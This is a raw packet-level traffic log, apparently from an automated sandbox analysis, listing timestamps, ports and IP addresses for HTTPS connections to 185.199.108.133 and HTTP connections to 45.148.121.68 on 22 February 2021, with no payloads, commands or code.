Feb 22, 2021 20:35:03.413078070 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.413343906 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.413398027 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.413448095 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.414236069 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.414275885 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.414323092 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.415600061 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.415652037 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.415700912 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.416017056 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.416058064 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.416105032 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.418658972 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.418721914 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.418792963 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.419080973 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.419146061 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.419368029 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.419925928 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.420005083 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.420056105 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.420066118 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.420120001 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.420165062 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.420809984 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.420860052 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.420914888 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.421665907 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.421721935 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.421788931 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.422504902 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.422559023 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.422621012 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.423388004 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.423460960 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.423521042 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.424493074 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.424551964 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.424607038 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.425107002 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.425163984 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.425214052 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.425992966 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.426048994 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.426115990 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.427273035 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.427340984 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.427403927 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.427735090 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.427792072 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.427894115 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.428597927 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.428644896 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.428689957 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.429476023 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.429523945 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.429564953 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.429569006 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.429610014 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.429657936 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.430358887 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.430413008 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.430483103 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.431247950 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.431298018 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.431345940 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.432133913 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.432182074 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.432234049 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.432990074 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.433037996 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.433089972 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.433912039 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.433964014 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.434011936 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.434751034 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.434798956 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.434847116 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.441519976 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.441576004 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.441610098 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.441643000 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.441675901 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.441714048 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.441739082 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.441751957 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.441777945 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.441788912 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.441824913 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.441829920 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.441860914 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.441896915 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.441898108 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.441935062 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.441975117 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.441976070 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.442013025 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.442049980 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.442050934 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.442085981 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.442126036 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.442156076 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.442162037 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.442198038 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.442660093 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.442725897 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.442770958 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.444652081 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.444693089 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.444750071 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.445054054 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.445087910 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.445122004 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.446135998 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.446168900 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.446211100 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.446787119 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.446820021 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.446871996 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.447681904 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.447719097 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.447762012 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.448523998 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.448553085 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.448597908 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.449459076 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.449481010 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.449533939 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.450275898 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.450297117 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.450345039 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.451522112 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.451548100 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.451596975 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.451934099 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.451957941 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.452025890 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.456360102 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.456383944 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.456454992 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.456721067 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.456739902 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.456789017 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.457639933 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.457669020 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.457714081 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.458584070 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.458616972 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.458657026 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.459306955 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.459348917 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.459395885 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.460202932 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.460237026 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.460278034 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.462162018 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.462193966 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.462238073 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.462682962 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.462713957 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.462759018 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.463412046 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.463444948 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.463493109 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.464289904 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.464320898 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.464378119 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.465125084 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.465162039 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.465231895 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.465926886 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.465961933 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.465989113 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.466012955 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.466016054 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.466104984 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.466777086 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.466809034 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.466886997 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.467605114 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.467636108 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.467693090 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.468456984 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.468485117 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.468529940 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.469293118 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.469315052 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.469367027 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.470129967 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.470155954 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.470210075 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.471103907 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.471143961 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.471191883 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.471906900 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.471965075 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.472018957 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.472692013 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.472717047 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.472832918 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.473536015 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.473561049 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.473613024 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.474407911 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.474438906 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.474490881 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.475256920 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.475285053 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.475380898 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.476123095 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.476145983 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.476162910 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.476180077 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.476196051 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.476227999 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.476944923 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.476964951 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.477041960 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.477773905 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.477797985 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.477854013 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.478686094 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.478712082 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.478763103 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.485542059 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.485579967 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.485658884 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.485893965 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.485920906 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.485966921 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.486776114 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.486807108 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.486850977 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.487651110 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.487680912 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.487726927 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.488524914 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.488555908 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.488606930 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.489398003 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.489434004 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.489474058 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.490210056 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.490236998 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.490282059 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.491069078 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.491101027 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.491163015 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.491923094 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.491952896 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.491976023 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.491997957 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.492002010 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.492041111 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.492723942 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.492809057 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.492882967 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.493571997 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.493608952 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.493719101 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.494415998 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.494451046 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.494518995 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:03.495242119 CET	443	49741	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:03.630454063 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:09.168334961 CET	49741	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:09.168335915 CET	49739	80	192.168.2.4	45.148.121.68
Feb 22, 2021 20:35:26.522936106 CET	49747	80	192.168.2.4	45.148.121.68
Feb 22, 2021 20:35:26.578032970 CET	80	49747	45.148.121.68	192.168.2.4
Feb 22, 2021 20:35:26.578155041 CET	49747	80	192.168.2.4	45.148.121.68
Feb 22, 2021 20:35:26.578821898 CET	49747	80	192.168.2.4	45.148.121.68
Feb 22, 2021 20:35:26.629501104 CET	80	49747	45.148.121.68	192.168.2.4
Feb 22, 2021 20:35:26.635423899 CET	80	49747	45.148.121.68	192.168.2.4
Feb 22, 2021 20:35:26.679275990 CET	49747	80	192.168.2.4	45.148.121.68
Feb 22, 2021 20:35:26.739973068 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:26.783498049 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:26.783732891 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:26.824222088 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:26.869494915 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:26.871236086 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:26.871304035 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:26.871342897 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:26.871475935 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:26.879256964 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:26.923420906 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:26.976392031 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.011670113 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.062464952 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.062515974 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.062566996 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.062619925 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.062644005 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.062680006 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.062719107 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.062731028 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.062778950 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.062793970 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.062830925 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.062882900 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.062911987 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.062949896 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.063004971 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.065705061 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.065768957 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.068073034 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.068696022 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.068721056 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.068792105 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.071969986 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.072005033 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.072103977 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.074949980 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.075062990 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.077017069 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.078037024 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.078074932 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.078203917 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.081203938 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.081243992 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.081345081 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.084306955 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.084340096 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.084506035 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.087405920 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.087470055 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.087933064 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.090537071 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.090573072 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.093657970 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.093725920 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.093794107 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.093810081 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.106887102 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.106992006 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.107026100 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.107058048 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.107089043 CET	49748	443	192.168.2.4	185.199.108.133
Feb 22, 2021 20:35:27.107103109 CET	443	49748	185.199.108.133	192.168.2.4
Feb 22, 2021 20:35:27.107137918 CET	443	49748	185.199.108.133	192.168.2.4
